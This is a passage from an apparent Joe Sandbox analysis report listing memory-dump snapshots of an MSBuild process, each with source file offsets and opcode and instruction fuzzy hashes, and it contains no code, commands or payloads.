                          • Opcode Fuzzy Hash: cb7f39155fe33b42e40416358227218f35198cc25f304c49f12fea2a79da5afd
                          • Instruction Fuzzy Hash: 5A21F5373042008FC3218B6AE848A6ABBE5EFC1321B15847AE55ECB661DB30EC46C760
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe6e5d0b4b3e67e5029acde66b5f03e39645ef9f5a33b991dbcd462ffedd31f0
                          • Instruction ID: e08beadfb4fd2fa8a16c6151ed64110edba7f0a6cc5668e55e67ab696788389e
                          • Opcode Fuzzy Hash: fe6e5d0b4b3e67e5029acde66b5f03e39645ef9f5a33b991dbcd462ffedd31f0
                          • Instruction Fuzzy Hash: CD213A30B046121BDB18A5298998F7F969FBFC5610F198D7D96164B2C4CE79EC01CBE4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1074add484c99a3549e116904ac8fb1f084d37023364a9cd36fb5192fe0e2bfa
                          • Instruction ID: f2929f9d84d12b8890d4b3ead32da4f0a1f80f35cde86f7c4c89602e2335795e
                          • Opcode Fuzzy Hash: 1074add484c99a3549e116904ac8fb1f084d37023364a9cd36fb5192fe0e2bfa
                          • Instruction Fuzzy Hash: BD219E30A08105CFDF04EF69E950BBE7FB6FB89212F1481A9D41A97295DB348902CB89
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43305891cd62a36a29f11d7ea74f9685d0bf943f4a078697d90f48a9b6d67c2d
                          • Instruction ID: d9c2f94d87b02d85dd518c4a75eac92d9e9c1677f367868c794fbe0bfbf8f164
                          • Opcode Fuzzy Hash: 43305891cd62a36a29f11d7ea74f9685d0bf943f4a078697d90f48a9b6d67c2d
                          • Instruction Fuzzy Hash: 51317C30B04108CFEB54CB19E448BAA77ABBB8C305F1480B5EA06E72A9DB711D45CB61
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6024f086d118118c71c64f2dd8760c894f0039b540bdfcacf85c01cf0a32a2f7
                          • Instruction ID: cd97a12412ed98bf589a084410533d3a377fa7482069b6830853d2bdcfc34744
                          • Opcode Fuzzy Hash: 6024f086d118118c71c64f2dd8760c894f0039b540bdfcacf85c01cf0a32a2f7
                          • Instruction Fuzzy Hash: AB31D734A01225CFEF28DB14CA60FBDB3B6BF54605F4159D99A0AAB3D0DB70AD41CE91
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ec92a6d25ec27af14d7b9015ca01f346116a2fa320c189ad1a85f7cceabfe73
                          • Instruction ID: d19889c08c41b41ed04b7e868bb70f7335a82838dd519282780f693715772d3c
                          • Opcode Fuzzy Hash: 3ec92a6d25ec27af14d7b9015ca01f346116a2fa320c189ad1a85f7cceabfe73
                          • Instruction Fuzzy Hash: AA210630B102049FDB159F64D454BAEBBB6FF89300F10852AE502AB2A1DF708C46C780
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b8c810d0e89e2646dc65a3bf2da3ac18ee6adf0eebd43995a0a6e3fed0aa63b
                          • Instruction ID: f14121a96c6b4fbd6da3c1519d76073c28113c381b744ef90b262efbd518231b
                          • Opcode Fuzzy Hash: 8b8c810d0e89e2646dc65a3bf2da3ac18ee6adf0eebd43995a0a6e3fed0aa63b
                          • Instruction Fuzzy Hash: AE218635B106098FCB05EF68D5549AEB7F6FF89700B10412AE506A7364EF74AE06CBE1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 64bc5fd0cd81c92ec9735110372c0c75cfde1c3d0bcf91f0d9040ab8df7912ba
                          • Instruction ID: 8f6384db42654ce0fee53fbddedf5c05f58153b4a684724064348ae3046486b0
                          • Opcode Fuzzy Hash: 64bc5fd0cd81c92ec9735110372c0c75cfde1c3d0bcf91f0d9040ab8df7912ba
                          • Instruction Fuzzy Hash: 22219C71A049058FCF18CBA8D184AACB7F5FF98224F1586D5D00BAB261CB35ED03CB51
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ddd5855601785838ec8d6132ed7149e952325597d46730e45007b4f388646120
                          • Instruction ID: 9e73c6150bc915c467b1356d5b28c9d670de2d0e496fd3e67acc28ed09b0850a
                          • Opcode Fuzzy Hash: ddd5855601785838ec8d6132ed7149e952325597d46730e45007b4f388646120
                          • Instruction Fuzzy Hash: E721B575E0024A9FCF14CF94C9106EEBBB6BF85304F14D52AD905BB784EBB1D4468B80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9cf165e3e67bf6af77fda8a59f29135c4e3f6f802e5520189c1f1142254f01ec
                          • Instruction ID: 10871ad4429e6cb5017b4c9d8094960e63814d34b04fad07de6c4d56edee1576
                          • Opcode Fuzzy Hash: 9cf165e3e67bf6af77fda8a59f29135c4e3f6f802e5520189c1f1142254f01ec
                          • Instruction Fuzzy Hash: BE21C036B0021A8F8B109BA9E8549BEB7BBFF80221B544476E826D7240EB35DC15C760
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3bffd3a06786d4f66f6c1219ce9a108ad842263639b2aff0cbd3eaacf918fff6
                          • Instruction ID: ed640c6dc53d8134d043e78c5d4121a78fe71d8946e1be6be0bdbecb0e00aff1
                          • Opcode Fuzzy Hash: 3bffd3a06786d4f66f6c1219ce9a108ad842263639b2aff0cbd3eaacf918fff6
                          • Instruction Fuzzy Hash: 91213072900616AFCB14DF58C980EAAFBB6FF40310F058669C4164B246C338E892CBC6
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d344a7450e1308f141e0b421dae27f26c29a8a71ea067cb72b26818522e8f49
                          • Instruction ID: a318b1020ea13e661587708b49fc1ffff0f312f624e2abddb34a418fd4000a96
                          • Opcode Fuzzy Hash: 2d344a7450e1308f141e0b421dae27f26c29a8a71ea067cb72b26818522e8f49
                          • Instruction Fuzzy Hash: AD214876E0421ADFDB50DFB8C504BAEBBF6AF44350F108066D52ADB290E734CA61CB91
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 773d4dae20d2c2710a2c08d84838613ac2027cead25f0f89b455065655ab5030
                          • Instruction ID: f4f6b8b219a7ce90cacb7fcd0c53bb1dbc6c1335bb5b3274828bcfa72acec85e
                          • Opcode Fuzzy Hash: 773d4dae20d2c2710a2c08d84838613ac2027cead25f0f89b455065655ab5030
                          • Instruction Fuzzy Hash: D731D634A01218EFCF44DF94D995AADBBF2FF88314F1480A8E506AB355CB71AD86CB40
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43ab9f76a9918ef4271614f953a971c677dbb1cad2297b929f2951ebdfd422b8
                          • Instruction ID: 33c16aa51b1ca498e33197294f53967262104f7797e2febde934e1a0d44d0c64
                          • Opcode Fuzzy Hash: 43ab9f76a9918ef4271614f953a971c677dbb1cad2297b929f2951ebdfd422b8
                          • Instruction Fuzzy Hash: B7319C34E002158FDB28DFA8C590ADEBBF6AF88720F108559D502BB351CB30A946CBA1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 174731c6be5601f91ea6c011675cb6ff364196a8267c939589cb52a71765fbc5
                          • Instruction ID: 49eaf30d721abe16da4882051d5667cece0b1ee44fe91cf52e0d6476406b1238
                          • Opcode Fuzzy Hash: 174731c6be5601f91ea6c011675cb6ff364196a8267c939589cb52a71765fbc5
                          • Instruction Fuzzy Hash: 72210471A0426CDFDB20CBA8D544FBA7FB6EB85310F1580EAE415D7281C631EC428BE2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa9e8fb66a36e8c8328b8fcf3143fac13ae4a86af94b0e3dbaae98447de48beb
                          • Instruction ID: f5fb465ff0339c1ada29a48834c5ad9782e2618c5751209d9a794e4fed11eb8b
                          • Opcode Fuzzy Hash: aa9e8fb66a36e8c8328b8fcf3143fac13ae4a86af94b0e3dbaae98447de48beb
                          • Instruction Fuzzy Hash: C531EA34A01225CFEF28DB10CA64FADB3B6BF54604F4159D99A0AAB3D0DB70AD41CE91
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe8361e492321123b6497d7fbaa0b65866ef6b521bd064ed9efe5d92279084ca
                          • Instruction ID: 7b108f8f15447faaf4673ea99fca1a3b6eb8397a0507688844d809cac377d599
                          • Opcode Fuzzy Hash: fe8361e492321123b6497d7fbaa0b65866ef6b521bd064ed9efe5d92279084ca
                          • Instruction Fuzzy Hash: 35318F34E002198FCB18DFA9C590ADEBBF6AF89710F108559D902BB351CF30A945CFA1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7212f959077e8e860670275283931667f378442a7a3074595bcff76ea68307fd
                          • Instruction ID: f32a49431b826e5991e047b392d02e601de889a4da2d4bfb6e468427cd1e7c7f
                          • Opcode Fuzzy Hash: 7212f959077e8e860670275283931667f378442a7a3074595bcff76ea68307fd
                          • Instruction Fuzzy Hash: 4A214D76A00115DFCB05CF99D998E99BBB2FF49320F0640A9F6059B372D732E811DB50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 116bf2a6f8c37b3d86bfb5f9c76a6c8b1ddd929faf7b6694c8c7904400ddedfb
                          • Instruction ID: 1ed40e947c9804cd553452dee337fd1ee9e4b9475b0087d8e52d23d7147f876e
                          • Opcode Fuzzy Hash: 116bf2a6f8c37b3d86bfb5f9c76a6c8b1ddd929faf7b6694c8c7904400ddedfb
                          • Instruction Fuzzy Hash: 74215C316042689FE7159769E844B263BEAEB89320F0A8072DE49C7286D735DC41C792
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 51e0f2f8acf0b47d8d8dcffac2efb69baf229ddc1f8cdfea22a32ed4edfe59f0
                          • Instruction ID: bd264987ba98d59875b096ce0bc87bbbd36038b790091fc7f02009bdcecdbaea
                          • Opcode Fuzzy Hash: 51e0f2f8acf0b47d8d8dcffac2efb69baf229ddc1f8cdfea22a32ed4edfe59f0
                          • Instruction Fuzzy Hash: B721C5366083809FCB168B74DC55BAA7FF1BF4A640F0940A6E941CB292EB35CC05CB60
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1f6fcb8d916866d71bcc3d3022eb18c4b183b22d487215efe9a634b4acabc3e8
                          • Instruction ID: a4bda4325d5bd7dbdf35ba133fc4d22338c11d71c63d69f54ce31a05946ab54e
                          • Opcode Fuzzy Hash: 1f6fcb8d916866d71bcc3d3022eb18c4b183b22d487215efe9a634b4acabc3e8
                          • Instruction Fuzzy Hash: F101B7379001199FDB05CF94D814C99BB76FF89320B0684A5EA05AB226D672E925EB90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72139f4fce8a2bd70fb7af5c15ae8a98a4288352d732e38ffe6dcf47f9a3c4d3
                          • Instruction ID: d045089e3ce0806a09f4e6776e1818d88edef341cfbcb7395b11ac3b24a64482
                          • Opcode Fuzzy Hash: 72139f4fce8a2bd70fb7af5c15ae8a98a4288352d732e38ffe6dcf47f9a3c4d3
                          • Instruction Fuzzy Hash: 2C219D75A4020AEFDF10EFA5D144AAE7FF1EB44310B0066EED01BDB250EA35AA048B80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c951d3e22fa456f0885c6cdb9869061c7f8f54b3e464aa2483b71bbb517c212
                          • Instruction ID: 79b16b0c1d12731642ce3f2e7c49d70ba9c542a58af2dd6944fc8d23c7649839
                          • Opcode Fuzzy Hash: 1c951d3e22fa456f0885c6cdb9869061c7f8f54b3e464aa2483b71bbb517c212
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d09c3144b2862bcbcb05354b332cbeaedb9dec55c8011d0a9533ee79dcaf0c45
                          • Instruction ID: 566271669d3db159f7296d6b9d74bd3305b83b80765876e44be1c783fe8857cf
                          • Opcode Fuzzy Hash: d09c3144b2862bcbcb05354b332cbeaedb9dec55c8011d0a9533ee79dcaf0c45
                          • Instruction Fuzzy Hash: 511191316006028FD718DF19E880E97B7AAFFC0314B10CA69D4558B719DF74F80ACB90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2354143987.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5d90000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f0bf3d722d60e6e1ebad3815c24f9e0c156747742bc7ce025d54b540038a588e
                          • Instruction ID: 86d50474860142808dbaf8fcb7de99f57e17393cafef6e0d977ebc115c9c2bad
                          • Opcode Fuzzy Hash: f0bf3d722d60e6e1ebad3815c24f9e0c156747742bc7ce025d54b540038a588e
                          • Instruction Fuzzy Hash: 5801A736350315AFDB048F59EC84FAE7BA9FF98721F108026FA14DF290CAB1D8108790
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62064839d549905d5005049685f25da1615b6566ee8276f91fe84635b1fa4ae0
                          • Instruction ID: e861daf84b93708e3e30fcdb5b672cf35d6f7e9d1c30dcf2d6db5b6004e20df1
                          • Opcode Fuzzy Hash: 62064839d549905d5005049685f25da1615b6566ee8276f91fe84635b1fa4ae0
                          • Instruction Fuzzy Hash: A6119A34B006088FCF04DF68D594AAEB7B6AB88310F28401AD803EB3A5CF309D46CB51
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38dcf63ecdbdc3ce12af8451b21c681764ab79ac84b6c528a180c0e72b8f63c1
                          • Instruction ID: f15b7429608d0b16cc30938fabe429dec6a0e9cfe5bc3eb890321d9f191f8d80
                          • Opcode Fuzzy Hash: 38dcf63ecdbdc3ce12af8451b21c681764ab79ac84b6c528a180c0e72b8f63c1
                          • Instruction Fuzzy Hash: D2117C30601B808FC715CF2AC498645FBF5FF89310B0589AAD88AC7A51CF34E846CF81
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1946e61cbe4c42db621b3cb2099a40b2ae03a425789f8d80b800f1e25f63d1c
                          • Instruction ID: d58a9466a9e23f69a8d0fab2335bc12364fb6875adac5c9fe15e3617a81ab17a
                          • Opcode Fuzzy Hash: e1946e61cbe4c42db621b3cb2099a40b2ae03a425789f8d80b800f1e25f63d1c
                          • Instruction Fuzzy Hash: 8D016131201B504BD764CB2AED80B9BBBE6EF84350F08542DD54A87661DF61F84A8760
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a0356da8d054a616d41a27706b8f9481d63b98ffe273ad5afa3edcabe20ab66
                          • Instruction ID: 992f67aa4438fbfd98955fae98a5fc31d235223b1298404cd4d842f37a631684
                          • Opcode Fuzzy Hash: 5a0356da8d054a616d41a27706b8f9481d63b98ffe273ad5afa3edcabe20ab66
                          • Instruction Fuzzy Hash: 7D017C78E4520FEFDF10EFA5E1409BE7FF1AB00300B1066EA9017EB244EA366A00CB51
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1aac1b8e9249c0e71a3b84a306b3bda1c460dc397fcd3fdba8591f3f1dc7bc20
                          • Instruction ID: 5ff2ce059b9792399cd0af862b0ce51b88f3ab66ec9887772982e89d7b4bf568
                          • Opcode Fuzzy Hash: 1aac1b8e9249c0e71a3b84a306b3bda1c460dc397fcd3fdba8591f3f1dc7bc20
                          • Instruction Fuzzy Hash: FF114934A11229CFEF24DB10CA54FAEB3B6BF44600F5049D99A09AB3D0DB706E41CF90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c220f4e3c52f292eb8a16bcbfffcfa5caaacdce74cddccc3cca63bdb8ad973a0
                          • Instruction ID: ca64e7268db77130a5cd9795cc2ad4392fa087cca5acb64c2a031304b6cac787
                          • Opcode Fuzzy Hash: c220f4e3c52f292eb8a16bcbfffcfa5caaacdce74cddccc3cca63bdb8ad973a0
                          • Instruction Fuzzy Hash: A601523124021497C759EB68F5419DBBB9DEE41224704CA7EE20E8F614DE67E90B8BC0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 12901f456f624fb61934a95053b7764e89a614148207ff3a77fb8539eb39d40e
                          • Instruction ID: f528b14c1fb8a2e8a265e42bfdc068e8b25e01cdaebc94c44dd366f4a7952e8e
                          • Opcode Fuzzy Hash: 12901f456f624fb61934a95053b7764e89a614148207ff3a77fb8539eb39d40e
                          • Instruction Fuzzy Hash: A501C0316102049BDF199FA4D929AAE7FB6FB8C301F10446DE802A7390DF754D02CB95
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 10aa242a5fa0da7d3292e8df179f08757506b9223a0ffa8ec9d18d4db29f1fd0
                          • Instruction ID: fc965aebd653d05acb3f1bda87932650d798d179ddca252ecba7981e73f5eaad
                          • Opcode Fuzzy Hash: 10aa242a5fa0da7d3292e8df179f08757506b9223a0ffa8ec9d18d4db29f1fd0
                          • Instruction Fuzzy Hash: 9111E574A04518CFCF44DF98D9809AEB7BABB48314F254156D803BB265CB30AD46CB21
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331356588.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_124d000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 35a9a8b3fe5305c80b9bee86109c4e55849b2c602cb361f641dda02af9235a5f
                          • Instruction ID: 9863119129da8311f7d65764c74050f0080564c6b59171a3bfbea3dff16d3f37
                          • Opcode Fuzzy Hash: 35a9a8b3fe5305c80b9bee86109c4e55849b2c602cb361f641dda02af9235a5f
                          • Instruction Fuzzy Hash: 0501DB710143889BE71CDA59DD84B67FFDCEF55764F18C46AEE090A286C2799840C671
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c81b1c429e4b8130a63099dd5693d2cd0e0434c2d2d97e2eb353832fd288795f
                          • Instruction ID: 3cb0b82a56ffd4817dc24382e6f95717519c4c3f9b8d536c27a38776dec85a94
                          • Opcode Fuzzy Hash: c81b1c429e4b8130a63099dd5693d2cd0e0434c2d2d97e2eb353832fd288795f
                          • Instruction Fuzzy Hash: 9201D1307047608FCB2AF778951476E6AD65F85314F1448BEC0478B7D5DF7AE80587A2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c23ad98e54974e7eac2c5c8f772ce781163cbb05f3ba993e0d2527f98e0aa1ad
                          • Instruction ID: d47b74d425286525bcf6703e97ce17e795887cf20a7069a860aa232b34f43bd0
                          • Opcode Fuzzy Hash: c23ad98e54974e7eac2c5c8f772ce781163cbb05f3ba993e0d2527f98e0aa1ad
                          • Instruction Fuzzy Hash: 6401B130610204ABDF19AF64D828AAE7FF6EB8C701F10406DF802A7390CFB15D01CBA5
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa54438b59c8ddfba8457d131cadf56835184a7ba380cdddabdf84ba9a598e26
                          • Instruction ID: 7736cdcd0c1f6fb05557be1de8ae4fb1ea32980ec0f39ad9ee59a3e68e8a38ea
                          • Opcode Fuzzy Hash: aa54438b59c8ddfba8457d131cadf56835184a7ba380cdddabdf84ba9a598e26
                          • Instruction Fuzzy Hash: FE012672A04025DBC700DAA9984DBAFBF96EB8C710F058136EA0BF3142EE7058014BC0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 456e161e0240825ea71ee3fc87f89440eebda07c60b26601900fa8c24b248f90
                          • Instruction ID: d136d7dfbebc4878bd535522644c57c4a08be36adeaa4b02dcb0712a32aa2205
                          • Opcode Fuzzy Hash: 456e161e0240825ea71ee3fc87f89440eebda07c60b26601900fa8c24b248f90
                          • Instruction Fuzzy Hash: D9015E70A44A09CFDF00DF99C184BAEBBB6AF48310F248156D403AF255CF74A987CB52
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9d702e465f110d94a0333ee55ea18d44bcc8298da3ff546ef47c223dfe078cb4
